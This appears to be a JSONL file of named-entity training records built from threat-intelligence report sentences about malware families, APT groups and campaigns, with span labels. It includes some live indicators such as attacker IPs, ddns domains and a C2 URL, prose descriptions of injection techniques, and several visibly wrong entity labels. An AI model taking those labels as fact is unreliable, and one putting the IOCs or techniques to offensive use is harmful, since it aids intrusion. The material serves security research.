{"text": "EventBot screenPinPrefs.xml The content of screenPinPrefs.xml . The malware was first seen packed with VMProtect; when unpacked the sample didn’t show any similarities with previously known malware . The macro ran a PowerShell command that attempted to download additional PowerShell loader scripts for PupyRAT , a research and penetration-testing tool that has been used in attacks .", "spans": {"MALWARE: malware": [[68, 75]], "MALWARE: PowerShell command": [[216, 234]], "TOOL: PowerShell": [[273, 283]], "MALWARE: PupyRAT": [[303, 310]], "MALWARE: research and penetration-testing tool": [[315, 352]]}, "info": {"id": "cyberner_stix_train_000623", "source": "cyberner_stix_train"}}
{"text": "Hermes ransomware , the predecessor to Ryuk , was first distributed in February 2017 . When conducting programmatic espionage activity , it can presumably become quite confusing if the attacker targets a heavy industry company , an avionics program , and seven other unique targets as to which infected host you will collect what information from .", "spans": {"TOOL: Hermes ransomware": [[0, 17]], "TOOL: Ryuk": [[39, 43]], "ORGANIZATION: heavy industry company": [[204, 226]]}, "info": {"id": "cyberner_stix_train_000624", "source": "cyberner_stix_train"}}
{"text": "Our research team analyzed the malicious Android application that is most likely being spread by TrickBot and dubbed it “ TrickMo. ” Targeting users in Germany at this time , TrickMo is the latest variation in the transaction authentication number ( TAN ) -stealing malware category . Analysis of the emails has shown that the attachment contains an exploit for the CVE-2017-11882 vulnerability . Interestingly , the targeted organization in the January 16 attack had already been targeted by the OilRig group a year ago on January 2017 .", "spans": {"SYSTEM: Android": [[41, 48]], "MALWARE: TrickBot": [[97, 105]], "MALWARE: TrickMo.": [[122, 130]], "MALWARE: TrickMo": [[175, 182]], "VULNERABILITY: exploit": [[350, 357]], "VULNERABILITY: CVE-2017-11882 vulnerability": [[366, 394]], "THREAT_ACTOR: OilRig group": [[497, 509]]}, "info": {"id": "cyberner_stix_train_000625", "source": "cyberner_stix_train"}}
{"text": "Today we are sharing this information to raise awareness of these risks across the industry and calling for better enterprise integration of IoT devices , particularly the ability to monitor IoT device telemetry within enterprise networks .", "spans": {"TOOL: IoT": [[141, 144], [191, 194]]}, "info": {"id": "cyberner_stix_train_000626", "source": "cyberner_stix_train"}}
{"text": "The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell . Another decoy slideshow associated with the Bookworm attack campaign contains photos of an event called Bike for Dad 2015 .", "spans": {"TOOL: python script": [[63, 76]], "VULNERABILITY: CVE-2017-0144": [[132, 145]], "MALWARE: errr.aspx": [[194, 203]], "FILEPATH: decoy slideshow": [[223, 238]]}, "info": {"id": "cyberner_stix_train_000627", "source": "cyberner_stix_train"}}
{"text": "Therefore , the Stuxnet MOF file creation tool that the Shadow Brokers dropped on Friday is possibly the earliest technical evidence that NSA hackers and developers coded Stuxnet , as many suspect . We noted in our original blog the large amount of targeting of Iranian citizens in this campaign , we observed almost one-third of all victims to be Iranian .", "spans": {"TOOL: Stuxnet MOF": [[16, 27]], "ORGANIZATION: NSA": [[138, 141]], "TOOL: Stuxnet": [[171, 178]], "ORGANIZATION: citizens": [[270, 278]]}, "info": {"id": "cyberner_stix_train_000628", "source": "cyberner_stix_train"}}
{"text": "Finally , depending on how interesting the victim is , they malware operators may deploy another custom backdoor .", "spans": {}, "info": {"id": "cyberner_stix_train_000629", "source": "cyberner_stix_train"}}
{"text": "These characteristics suggest that the threat group is well resourced and has access to a tools development team and a team focused on SWCs .", "spans": {"TOOL: SWCs": [[135, 139]]}, "info": {"id": "cyberner_stix_train_000631", "source": "cyberner_stix_train"}}
{"text": "Chrysaor is spyware believed to be created by NSO Group Technologies , specializing in the creation and sale of software and infrastructure for targeted attacks . Our investigation of Leafminer started with the discovery of JavaScript code on several compromised websites in the Middle East . APT33 : 192.119.15.40 [REDACTED].ddns.net . None Ensure X - Forwarded - For header is configured to log true external IP addresses for request to proxied services .", "spans": {"MALWARE: Chrysaor": [[0, 8]], "ORGANIZATION: NSO Group Technologies": [[46, 68]], "THREAT_ACTOR: Leafminer": [[184, 193]], "TOOL: JavaScript code": [[224, 239]], "TOOL: compromised websites": [[251, 271]], "THREAT_ACTOR: APT33": [[293, 298]], "IP_ADDRESS: 192.119.15.40": [[301, 314]], "DOMAIN: [REDACTED].ddns.net": [[315, 334]]}, "info": {"id": "cyberner_stix_train_000632", "source": "cyberner_stix_train"}}
{"text": "Microsoft Threat Intelligence refers to the activity group behind these attacks as TERBIUM , following our internal practice of assigning rogue actors chemical element names . We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers .", "spans": {"ORGANIZATION: Microsoft Threat Intelligence": [[0, 29]], "THREAT_ACTOR: TERBIUM": [[83, 90]], "MALWARE: Carbanak": [[196, 204]], "THREAT_ACTOR: criminals": [[271, 280]], "ORGANIZATION: financial industry": [[321, 339]], "ORGANIZATION: customers": [[363, 372]]}, "info": {"id": "cyberner_stix_train_000633", "source": "cyberner_stix_train"}}
{"text": "Secondly , some of the MiniDuke components do not contain a hardcoded C&C server address , but instead obtain the address of a current C&C server via Twitter .", "spans": {"MALWARE: MiniDuke": [[23, 31]], "TOOL: C&C": [[70, 73], [135, 138]], "TOOL: Twitter": [[150, 157]]}, "info": {"id": "cyberner_stix_train_000634", "source": "cyberner_stix_train"}}
{"text": "In the most recent case , the choice of the payload zip file depends on the device process architecture . We identified two methods to deliver the KerrDown downloader to targets . The group is known for frequently changing malware and driving global trends in criminal malware distribution .", "spans": {"ORGANIZATION: We": [[106, 108]], "MALWARE: KerrDown": [[147, 155]]}, "info": {"id": "cyberner_stix_train_000635", "source": "cyberner_stix_train"}}
{"text": "The other overlapping files are tools used by the adversary to locate other systems on the network etool.exe , check to see if they are vulnerable to CVE-2017-0144 (EternalBlue) patched in MS07-010 checker1.exe and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket psexec.exe . The Tropic Trooper threat actor group has been known to target governments and organizations in the Asia Pacific region for at least six years .", "spans": {"MALWARE: etool.exe": [[99, 108]], "VULNERABILITY: CVE-2017-0144": [[150, 163]], "MALWARE: MS07-010": [[189, 197]], "MALWARE: checker1.exe": [[198, 210]], "MALWARE: PsExec": [[295, 301]], "MALWARE: psexec.exe": [[322, 332]], "THREAT_ACTOR: Tropic Trooper threat actor group": [[339, 372]], "ORGANIZATION: governments": [[398, 409]]}, "info": {"id": "cyberner_stix_train_000636", "source": "cyberner_stix_train"}}
{"text": "The fact the trojan can steal both the victim ’ s credentials and also can control their SMS messages and generated 2FA codes means DEFENSOR ID ’ s operators can bypass two-factor authentication . On June 18 , the majority of the campaign’s spam emails were sent with the subject , Your RAKBANK Tax Invoice / Tax Credit Note” or Confirmation . This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets Bitcoin users and global financial organizations .", "spans": {"MALWARE: DEFENSOR ID": [[132, 143]], "THREAT_ACTOR: Lazarus": [[388, 395]], "TOOL: emails": [[416, 422]], "ORGANIZATION: Bitcoin users": [[473, 486]], "ORGANIZATION: financial organizations": [[498, 521]]}, "info": {"id": "cyberner_stix_train_000637", "source": "cyberner_stix_train"}}
{"text": "WannaCry appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD ( via Bitcoin ) to decrypt the data . As mentioned in our previous blog on Bookworm , the Trojan sends a static date string to the C2 server that we referred to as a campaign code .", "spans": {"TOOL: WannaCry": [[0, 8]], "MALWARE: .WCRY": [[47, 52]], "MALWARE: Bookworm": [[207, 215]], "MALWARE: Trojan": [[222, 228]], "TOOL: C2": [[263, 265]]}, "info": {"id": "cyberner_stix_train_000638", "source": "cyberner_stix_train"}}
{"text": "We have observed this trojan being submitted to public antivirus testing platforms , once as a package and once for each DLL to determine the detection ratio . LYCEUM delivers weaponized maldocs via spearphishing from the compromised accounts to the targeted executives , human resources (HR) staff , and IT personnel . We can confirm that the APT38 operator activity is linked to the North Korean regime , but maintains a set of common characteristics , including motivation , malware , targeting , and TTPs that set it apart from other statesponsored operations .", "spans": {"THREAT_ACTOR: LYCEUM": [[160, 166]], "TOOL: maldocs": [[187, 194]]}, "info": {"id": "cyberner_stix_train_000639", "source": "cyberner_stix_train"}}
{"text": "One such interesting example was “ ПЛАН_РЕАЛИЗАЦИИ_ПРОЕКТА.rar ” ( SHA256 b5c208e4fb8ba255883f771d384ca85566c7be8adcf5c87114a62efb53b73fda ) .", "spans": {"FILEPATH: ПЛАН_РЕАЛИЗАЦИИ_ПРОЕКТА.rar": [[35, 62]], "FILEPATH: b5c208e4fb8ba255883f771d384ca85566c7be8adcf5c87114a62efb53b73fda": [[74, 138]]}, "info": {"id": "cyberner_stix_train_000640", "source": "cyberner_stix_train"}}
{"text": "Specifically , the targeting of organizations in the aerospace and energy sectors indicates that the APT33 is likely in search of strategic intelligence capable of benefitting a government or military sponsor . In August 2014 , some of our users observed targeted attacks with a variation of CVE-2012-0158 and an unusual set of malware .", "spans": {"ORGANIZATION: aerospace": [[53, 62]], "ORGANIZATION: energy sectors": [[67, 81]], "THREAT_ACTOR: APT33": [[101, 106]], "ORGANIZATION: government": [[178, 188]], "ORGANIZATION: military": [[192, 200]], "VULNERABILITY: CVE-2012-0158": [[292, 305]]}, "info": {"id": "cyberner_stix_train_000641", "source": "cyberner_stix_train"}}
{"text": "Capabilities and functionality In 2013 , we detected several technological innovations developed and used by criminals in their malicious software . TAA triggered an alert at a large telecoms operator in Southeast Asia . Notice the “ Servcie ” typo . Based on these symbols , Mandiant assesses with moderate confidence that com.docker.vmnat was a version of the FULLHOUSE.DOORED backdoor .", "spans": {"ORGANIZATION: TAA": [[149, 152]], "ORGANIZATION: telecoms operator": [[183, 200]], "MALWARE: com.docker.vmnat": [[324, 340]], "MALWARE: the FULLHOUSE.DOORED backdoor": [[358, 387]]}, "info": {"id": "cyberner_stix_train_000642", "source": "cyberner_stix_train"}}
{"text": "The encrypted body is composed of various identifiers which are joined together : doFinal ( ) is called to encrypt the device information string : The user agent string is built from the package name and IMEI number : Finally the HTTP request is sent to the server at https : //54.71.249.137/eddd0317-2bdc-4140-86cb-0e8d7047b874 . ISMDoor is able to exfiltrate data , take screenshots , and execute arbitrary commands on the victim 's machine . The malicious documents , the droppers and the RAT itself are developed around cloud providers . The PDF usually named “ CriticalBreachDetected.pdf ” is generated using content embedded in the ransomware binary , including the skeleton PDF and the ransom note .", "spans": {"TOOL: ISMDoor": [[331, 338]], "TOOL: RAT": [[492, 495]], "TOOL: cloud providers": [[524, 539]]}, "info": {"id": "cyberner_stix_train_000643", "source": "cyberner_stix_train"}}
{"text": "As mentioned in the Hermes to Ryuk section , Ryuk uses a combination of symmetric ( AES ) and asymmetric ( RSA ) encryption to encrypt files . Securelist believe the attacks are launched by an APT Group we track under the codename \" ScarCruft \" .", "spans": {"TOOL: Hermes": [[20, 26]], "TOOL: Ryuk": [[30, 34], [45, 49]], "TOOL: AES": [[84, 87]], "TOOL: RSA": [[107, 110]], "THREAT_ACTOR: Securelist": [[143, 153]], "THREAT_ACTOR: ScarCruft": [[233, 242]]}, "info": {"id": "cyberner_stix_train_000644", "source": "cyberner_stix_train"}}
{"text": "Device registration This is the last of the three main timers that are created . More recently , ITG08 has been observed targeting e-commerce environments by injecting malicious code into online checkout pages of compromised websites — a technique known as online skimming — thereby stealing payment card data transmitted to the vendor by unsuspecting customers . In May 2017 , APT37 used a bank liquidation letter as a spear phishing lure against a board member of a Middle Eastern financial company .", "spans": {"THREAT_ACTOR: ITG08": [[97, 102]], "ORGANIZATION: e-commerce environments": [[131, 154]], "THREAT_ACTOR: APT37": [[378, 383]], "ORGANIZATION: board member": [[450, 462]], "ORGANIZATION: financial company": [[483, 500]]}, "info": {"id": "cyberner_stix_train_000645", "source": "cyberner_stix_train"}}
{"text": "This is a better implementation , as it allows servers and clients from different versions to communicate with each other to some extent .", "spans": {}, "info": {"id": "cyberner_stix_train_000646", "source": "cyberner_stix_train"}}
{"text": "It even has its own virtual keyboard that supposedly protects the victim from keyloggers . MXI Player appears to be a version of the Bahamut agent , designed to record the phone calls and collect other information about the user ( com.mxi.videoplay ) . Active since at least 2014 , this actor has long-standing interest in maritime industries , naval defense contractors , and associated research institutions in the United States and Western Europe .", "spans": {"MALWARE: MXI Player": [[91, 101]], "THREAT_ACTOR: actor": [[287, 292]], "ORGANIZATION: maritime industries": [[323, 342]], "ORGANIZATION: naval defense contractors": [[345, 370]], "ORGANIZATION: research institutions": [[388, 409]]}, "info": {"id": "cyberner_stix_train_000647", "source": "cyberner_stix_train"}}
{"text": "Malicious iOS profile In the case of Apple devices , the downloaded malicious iOS profile gathers the following : Unique device identifier ( UDID ) International Mobile Equipment Identity ( IMEI ) Integrated Circuit Card ID ( ICCID ) Mobile equipment identifier ( MEID ) Version number Product number The profile installations differ depending on the iOS . Numbered Panda has a long list of high-profile victims and is known by a number of names including : DYNCALC , IXESHE , JOY RAT , APT-12 , etc . When set in text receive mode, the malware uses the AdrGen function to create another query string with the r (receiver) flag and a W (wait) action . At Talos , we pride ourselves on the quality of the intelligence we publish .", "spans": {"SYSTEM: iOS": [[10, 13], [78, 81], [351, 354]], "SYSTEM: Apple": [[37, 42]], "THREAT_ACTOR: Numbered Panda": [[357, 371]], "THREAT_ACTOR: DYNCALC": [[458, 465]], "THREAT_ACTOR: IXESHE": [[468, 474]], "THREAT_ACTOR: JOY RAT": [[477, 484]], "THREAT_ACTOR: APT-12": [[487, 493]], "ORGANIZATION: Talos": [[655, 660]]}, "info": {"id": "cyberner_stix_train_000648", "source": "cyberner_stix_train"}}
{"text": "After making headlines during 2016 due to its involvement in cyber attacks against an organization involved in the U.S. presidential election , APT28 ( aka Swallowtail , Fancy Bear ) has continued to mount operations during 2017 and 2018 .", "spans": {"ORGANIZATION: presidential election": [[120, 141]], "THREAT_ACTOR: APT28": [[144, 149]], "THREAT_ACTOR: Swallowtail": [[156, 167]], "THREAT_ACTOR: Fancy Bear": [[170, 180]]}, "info": {"id": "cyberner_stix_train_000649", "source": "cyberner_stix_train"}}
{"text": "The attack group then used these stolen credentials to gain access to the DNC network , install malware , move across the network , and steal data , including a trove of emails .", "spans": {"ORGANIZATION: DNC": [[74, 77]], "TOOL: emails": [[170, 176]]}, "info": {"id": "cyberner_stix_train_000650", "source": "cyberner_stix_train"}}
{"text": "We 've seen this actor rely heavily on phishing campaigns to trick victims into downloading their malicious apps , specifically on Facebook . The DeltaCharlie DDoS bot was originally reported by Novetta in their 2016 Operation Blockbuster Malware Report . However, starting from 7Zip version 9.34 (next available installer after version 9.22) up to its latest version 19.0, 7zip saw and was able to extract the image file order.jpg . Second , as COSMICENERGY was potentially developed as part of a red team , this discovery suggests that the barriers to entry are lowering for offensive OT threat activity since we normally observe these types of capabilities limited to well resourced or state sponsored actors .", "spans": {"SYSTEM: Facebook": [[131, 139]], "ORGANIZATION: Novetta": [[195, 202]], "TOOL: 7Zip": [[279, 283]], "TOOL: 7zip": [[374, 378]], "FILEPATH: order.jpg": [[422, 431]], "MALWARE: COSMICENERGY": [[446, 458]]}, "info": {"id": "cyberner_stix_train_000651", "source": "cyberner_stix_train"}}
{"text": "Last week iSIGHT 's sources provided us with the same KillDisk malware published by Rob Lee of SANS and Dragos Security . Mark Zuckerberg , Jack Dorsey , Sundar Pichai , and Daniel Ek — the CEOs of Facebook , Twitter , Google and Spotify , respectively — have also fallen victim to the hackers , dispelling the notion that a career in software and technology exempts one from being compromised .", "spans": {"ORGANIZATION: iSIGHT": [[10, 16]], "TOOL: KillDisk malware": [[54, 70]], "ORGANIZATION: SANS": [[95, 99]], "ORGANIZATION: Dragos Security": [[104, 119]], "ORGANIZATION: Mark Zuckerberg": [[122, 137]], "ORGANIZATION: Jack Dorsey": [[140, 151]], "ORGANIZATION: Sundar Pichai": [[154, 167]], "ORGANIZATION: Daniel Ek": [[174, 183]], "ORGANIZATION: CEOs": [[190, 194]], "ORGANIZATION: Facebook": [[198, 206]], "ORGANIZATION: Twitter": [[209, 216]], "ORGANIZATION: Google": [[219, 225]], "ORGANIZATION: technology": [[348, 358]]}, "info": {"id": "cyberner_stix_train_000652", "source": "cyberner_stix_train"}}
{"text": "∗ android.permission.WRITE_SETTINGS ( read/write global system settings ) ∗ android.permission.RECEIVE_SMS ( intercept SMS messages ) ∗ android.permission.READ_PHONE_STATE ( read phone details of the device such as phone number and serial number ) ∗ android.permission.CHANGE_WIFI_STATE ( connect to and disconnect from Wi-Fi networks and make changes to configured networks ) ∗ android.permission.READ_CONTACTS ( read all contact data ) * android.permission.READ_SMS However , the attack is different in two respects : unlike other APTs , the main focus of Blue Termite is to attack Japanese organizations ; and most of their C2s are located in Japan . Organizations with high financial or intellectual property value should take the time to ensure their security requirements are met and that employee ’s are educated about the security threats their organizations face . In addition to the complexity of managing CSP rules , this vulnerability shows how widely used services such as Google Analytics can be subverted to bypass this protection .", "spans": {"TOOL: Blue Termite": [[558, 570]], "SYSTEM: Google Analytics": [[986, 1002]]}, "info": {"id": "cyberner_stix_train_000653", "source": "cyberner_stix_train"}}
{"text": "From there , root-level apps can read or modify data and resources that would be off-limits to normal apps . CTU researchers also identified components in the custom C2 protocol being used ( the way in which the malware talks to the Command and Control Servers ) which they have seen utilized by Nickel Academy ( Lazarus ) previously . APT33 : 192.119.15.35 mynetwork.ddns.net . The group itself likes to pretend to be a cybersecurity organization as shown in the ransom note below .", "spans": {"ORGANIZATION: CTU": [[109, 112]], "TOOL: custom C2 protocol": [[159, 177]], "THREAT_ACTOR: Nickel Academy": [[296, 310]], "THREAT_ACTOR: Lazarus": [[313, 320]], "THREAT_ACTOR: APT33": [[336, 341]], "IP_ADDRESS: 192.119.15.35": [[344, 357]], "DOMAIN: mynetwork.ddns.net": [[358, 376]], "THREAT_ACTOR: pretend to be a cybersecurity organization": [[405, 447]]}, "info": {"id": "cyberner_stix_train_000654", "source": "cyberner_stix_train"}}
{"text": "is very similar to newer ones , but it provides additional insights being not obfuscated : Firstly we can notice that , instead of generic domain names or IP addresses , these samples communicated with a Command & Control server located at attiva.exodus.esurv [ . Based on the command capabilities of the Taidoor malware , we were able to determine that data theft and data destruction was possible . Downloads additional payloads . Limited forensic evidence existed to determine exactly how STRATOFEAR was deployed to systems in the victim environment ; however , in each instance , STRATOFEAR was preceded by the deployment of FULLHOUSE.DOORED .", "spans": {"TOOL: Taidoor malware": [[305, 320]], "MALWARE: STRATOFEAR": [[492, 502], [584, 594]], "MALWARE: FULLHOUSE.DOORED": [[629, 645]]}, "info": {"id": "cyberner_stix_train_000655", "source": "cyberner_stix_train"}}
{"text": "CTU researchers have no evidence of other threat actors using RCSession or of wide proliferation of the tool , suggesting it may be exclusively used by BRONZE PRESIDENT .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "MALWARE: RCSession": [[62, 71]], "THREAT_ACTOR: BRONZE PRESIDENT": [[152, 168]]}, "info": {"id": "cyberner_stix_train_000656", "source": "cyberner_stix_train"}}
{"text": "Assuming these checks pass , one of the main ELF libraries is loaded that orchestrates other components and provides functionality to the app ’ s Dalvik code through the Java Native Interface ( JNI ) . APT41 activity aimed at medical device companies and pharmaceuticals is demonstrative of the group's capacity to collect sensitive and highly valuable intellectual property (IP) , although we have not observed evidence of IP theft since late 2015 . APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments and militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian government .", "spans": {"THREAT_ACTOR: APT41": [[202, 207]], "ORGANIZATION: medical device companies": [[226, 250]], "ORGANIZATION: governments": [[588, 599]], "ORGANIZATION: militaries": [[604, 614]], "ORGANIZATION: defense attaches": [[617, 633]], "ORGANIZATION: media entities": [[636, 650]], "ORGANIZATION: dissidents": [[657, 667]], "ORGANIZATION: figures": [[672, 679]], "ORGANIZATION: Russian government": [[703, 721]]}, "info": {"id": "cyberner_stix_train_000657", "source": "cyberner_stix_train"}}
{"text": "This is similar to the way in which the toolset was being spread via trojanized applications in torrent files during the summer of 2013 .", "spans": {}, "info": {"id": "cyberner_stix_train_000658", "source": "cyberner_stix_train"}}
{"text": "A good write-up from 2014 on the malware can be found in this writeup from Yury Namestnikov , Vladimir Kuskov , Oleg Kupreev at Kaspersky Lab here and indicates that the returned data is an RC4 encrypted loader that sets-up the main Chthonic module which can download additional modules or malware .", "spans": {"MALWARE: Chthonic": [[233, 241]]}, "info": {"id": "cyberner_stix_train_000659", "source": "cyberner_stix_train"}}
{"text": "“ In the future , we can expect that the bad guys will try to make use of Facebook statuses or deploy LinkedIn and other social networks ” , states ESET ’ s researcher . Just as with romance scams , actors make use of scripts and templates they can copy-and-paste without having to create something on their own . To date , the Lazarus group has been one of the most successful in launching large scale operations against the financial industry .", "spans": {"SYSTEM: Facebook": [[74, 82]], "SYSTEM: LinkedIn": [[102, 110]], "ORGANIZATION: ESET": [[148, 152]], "THREAT_ACTOR: actors": [[199, 205]], "TOOL: scripts": [[218, 225]], "TOOL: templates": [[230, 239]], "THREAT_ACTOR: Lazarus group": [[328, 341]], "ORGANIZATION: financial industry": [[426, 444]]}, "info": {"id": "cyberner_stix_train_000660", "source": "cyberner_stix_train"}}
{"text": "The kit we found is in tgz format , though we have observed some samples disguised as png or jpg .", "spans": {"TOOL: tgz": [[23, 26]], "TOOL: png": [[86, 89]], "TOOL: jpg": [[93, 96]]}, "info": {"id": "cyberner_stix_train_000661", "source": "cyberner_stix_train"}}
{"text": "The high level flow of the exploit is as follows :", "spans": {}, "info": {"id": "cyberner_stix_train_000662", "source": "cyberner_stix_train"}}
{"text": "The Trojan has evolved since then , aided by a large-scale distribution campaign by its creators ( in spring-summer 2017 ) , helping Asacub to claim top spots in last year ’ s ranking by number of attacks among mobile banking Trojans , outperforming other families such as Svpeng and Faketoken . Of note , this methodology of naming abstracts away the \" who \" element – XENOTIME may represent a single discrete entity ( such as a Russian research institution ) or several entities working in coordination in a roughly repeatable , similar manner across multiple events . Based on the Ukranian language embedded in the backdoor , Cybereason raises the possibility that the backdoor was obtained in underground communities by the threat actors , rather than developed in-house by the group . The trojan acted like a legitimate application or file in order to trick users into running it .", "spans": {"MALWARE: Asacub": [[133, 139]], "MALWARE: Svpeng": [[273, 279]], "MALWARE: Faketoken": [[284, 293]], "THREAT_ACTOR: XENOTIME": [[370, 378]], "ORGANIZATION: research institution": [[438, 458]], "MALWARE: backdoor": [[618, 626], [672, 680]], "ORGANIZATION: Cybereason": [[629, 639]], "MALWARE: The trojan": [[790, 800]]}, "info": {"id": "cyberner_stix_train_000663", "source": "cyberner_stix_train"}}
{"text": "Email account A Gmail account with password is mentioned in the sample ’ s code : It contains the victim ’ s exfiltrated data and “ cmd ” directory with commands for victim devices . We analyzed a new RATANKBA variant ( BKDR_RATANKBA.ZAEL–A ) , discovered in June 2017 , that uses a PowerShell script instead of its more traditional PE executable form—a version that other researchers also recently identified . APT33 : 91.235.142.76 mywinnetwork.ddns.net . If the target system met predefined requirements , the malware used Twitter to look for specific tweets from pre - made accounts created by MiniDuke ’s command and control ( C2 ) operators , with specific tags labeling encrypted URLs for backdoors .", "spans": {"SYSTEM: Gmail": [[16, 21]], "TOOL: RATANKBA": [[201, 209]], "TOOL: BKDR_RATANKBA.ZAEL–A": [[220, 240]], "TOOL: PowerShell script": [[283, 300]], "THREAT_ACTOR: APT33": [[412, 417]], "IP_ADDRESS: 91.235.142.76": [[420, 433]], "DOMAIN: mywinnetwork.ddns.net": [[434, 455]]}, "info": {"id": "cyberner_stix_train_000664", "source": "cyberner_stix_train"}}
{"text": "pointer from its own process environment block ( PEB ) ( Note : The KernelCallbackTable points to an array of graphic functions used by Win32 kernel subsystem module win32k.sys as call-back into user-mode . As described in previous publications , the Rocket Kitten attackers make extensive use of various phishing schemes . Once kernel32 base is found , the shellcode will calculate the addresses of LoadLibraryA and GetProcAddress functions , and use them to resolve other necessary APIs , which include VirtualAlloc , RtlMoveMemory , and RtlZeroMemory . Further analyses of these similarities are available via Mandiant Advantage .", "spans": {"THREAT_ACTOR: Rocket Kitten": [[251, 264]], "THREAT_ACTOR: attackers": [[265, 274]], "TOOL: kernel32": [[329, 337]], "TOOL: LoadLibraryA": [[400, 412]], "TOOL: GetProcAddress": [[417, 431]], "TOOL: APIs": [[484, 488]], "TOOL: VirtualAlloc": [[505, 517]], "TOOL: RtlMoveMemory": [[520, 533]], "TOOL: RtlZeroMemory": [[540, 553]], "ORGANIZATION: Mandiant Advantage": [[613, 631]]}, "info": {"id": "cyberner_stix_train_000665", "source": "cyberner_stix_train"}}
{"text": "If the original SMS app has been restored , it will send “ the app returned to its original place. ” Controlling TrickMo TrickMo ’ s operators can control the malware via two channels : Through its C & C via a plaintext HTTP protocol using JSON objects Through encrypted SMS messages There are predefined commands to change the malware ’ s configuration and make it execute certain tasks . PUTTER PANDA is a determined adversary group , conducting intelligence-gathering operations targeting the Government , Defense , Research , and Technology sectors in the United States , with specific targeting of the US Defense and European satellite and aerospace industries . Symantec has found evidence of Starloader files being named AdobeUpdate.exe , AcrobatUpdate.exe , and INTELUPDATE.EXE among others .", "spans": {"MALWARE: TrickMo": [[113, 120], [121, 128]], "THREAT_ACTOR: PUTTER PANDA": [[390, 402]], "THREAT_ACTOR: group": [[429, 434]], "ORGANIZATION: Government": [[496, 506]], "ORGANIZATION: Defense": [[509, 516]], "ORGANIZATION: Research": [[519, 527]], "ORGANIZATION: Technology sectors": [[534, 552]], "ORGANIZATION: US Defense": [[607, 617]], "ORGANIZATION: satellite": [[631, 640]], "ORGANIZATION: aerospace industries": [[645, 665]], "ORGANIZATION: Symantec": [[668, 676]], "FILEPATH: Starloader files": [[699, 715]], "FILEPATH: AdobeUpdate.exe": [[728, 743]], "FILEPATH: AcrobatUpdate.exe": [[746, 763]], "FILEPATH: INTELUPDATE.EXE": [[770, 785]]}, "info": {"id": "cyberner_stix_train_000666", "source": "cyberner_stix_train"}}
{"text": "With the increased use of Android phones in business environments , it is important to defend against these threats by ensuring devices are kept current with the latest updates . The victims for the 2014-2015 versions are generally IT and real estate/investment companies and in both cases , a small number of computers have been infected throughout Wild Neutron . In addition , we analyzed the victims of this campaign and spotted an interesting overlap of this campaign with another APT actor known as DarkHotel . There are different installation flows for this campaign , but we will focus on the one that uses a URL shortcut .", "spans": {"SYSTEM: Android": [[26, 33]], "ORGANIZATION: IT": [[232, 234]], "ORGANIZATION: real estate/investment companies": [[239, 271]], "THREAT_ACTOR: Wild Neutron": [[350, 362]], "THREAT_ACTOR: DarkHotel": [[504, 513]]}, "info": {"id": "cyberner_stix_train_000667", "source": "cyberner_stix_train"}}
{"text": "Most of the affected devices were located in the Middle East , and many of the stolen data we saw is military-related ( e.g. , images , documents ) . The ScarCruft APT gang has made use of a Flash zero day patched Thursday by Adobe to attack more than two dozen high-profile targets in Russia and Asia primarily . The major error made by its operators allowed us to follow the command and control server of the GRIFFON implant last year . Any Greatness affiliates do n’t need a specific set of skills .", "spans": {"VULNERABILITY: Flash zero day": [[191, 205]], "MALWARE: GRIFFON": [[411, 418]]}, "info": {"id": "cyberner_stix_train_000668", "source": "cyberner_stix_train"}}
{"text": "However , successfully installing this malicious APK requires that the user has allowed the installation of such apps as controlled in the Unknown Sources settings . FireEye said it has tracked admin@338 's activity since 2013 and the group has largely targeted organizations involved in financial , economic and trade policy . Based on the code, it is unclear what initiates the Visual Basic script . On April 21 , 2022 , KillNet also stated that \" REVIL is back in the ranks . \"", "spans": {"ORGANIZATION: FireEye": [[166, 173]], "THREAT_ACTOR: admin@338": [[194, 203]], "THREAT_ACTOR: group": [[235, 240]], "ORGANIZATION: organizations": [[262, 275]], "ORGANIZATION: financial , economic and trade policy": [[288, 325]], "TOOL: Visual Basic": [[380, 392]]}, "info": {"id": "cyberner_stix_train_000669", "source": "cyberner_stix_train"}}
{"text": "Copy the stage 5 DLL into winlogon.exe Allocate a chunk of memory in winlogon.exe process and copy the same APC routine seen previously Read and save the original pointer of the __fnDWORD internal User32 routine ( located at offset +0x10 of the KernelCallbackTable ) and replace this pointer with the address of the APC stub routine After this function pointer hijacking , when winlogon.exe makes any graphical call ( GDI ) , the malicious code can execute without using CreateRemoteThread or As the Rocket Kitten group 's behavior was well characterized in previous publications ( see the recent report from Trend Micro and ClearSky ) . MZ header , PE header , as well as each section and their header , are decrypted separately using RC4 algorithm and a hardcoded key . UNC2529 has also used weaponized Microsoft Excel documents as a first stage downloader .", "spans": {"THREAT_ACTOR: Rocket Kitten group": [[500, 519]], "ORGANIZATION: Trend Micro": [[609, 620]], "ORGANIZATION: ClearSky": [[625, 633]], "TOOL: RC4": [[736, 739]], "THREAT_ACTOR: UNC2529": [[772, 779]]}, "info": {"id": "cyberner_stix_train_000670", "source": "cyberner_stix_train"}}
{"text": "Due to these changes without a new date string , we believe the date codes are used for campaign tracking rather than a Bookworm build identifier . If the user enables macro to open the xlsm file , it will then drop the legitimate script engine AutoHotkey along with a malicious script file .", "spans": {"MALWARE: date string": [[35, 46]], "MALWARE: date codes": [[64, 74]], "TOOL: Bookworm": [[120, 128]], "MALWARE: xlsm file": [[186, 195]], "FILEPATH: it": [[198, 200]]}, "info": {"id": "cyberner_stix_train_000671", "source": "cyberner_stix_train"}}
{"text": "For this purpose , the app receives from the C & C server the isGoogleIp flag , which indicates whether the IP address of the affected device falls within the range of known IP addresses for Google servers . Finally , Kaspersky produced a summary report on Sofacy’s summertime activity . When the attacker wants to gather information on the infected system (action 5) , it retrieves the following information: Hostname IP address Computer name Username name Connected drive OS version Architecture Start menu programs Installed software .", "spans": {"ORGANIZATION: Kaspersky": [[218, 227]], "THREAT_ACTOR: Sofacy’s": [[257, 265]]}, "info": {"id": "cyberner_stix_train_000672", "source": "cyberner_stix_train"}}
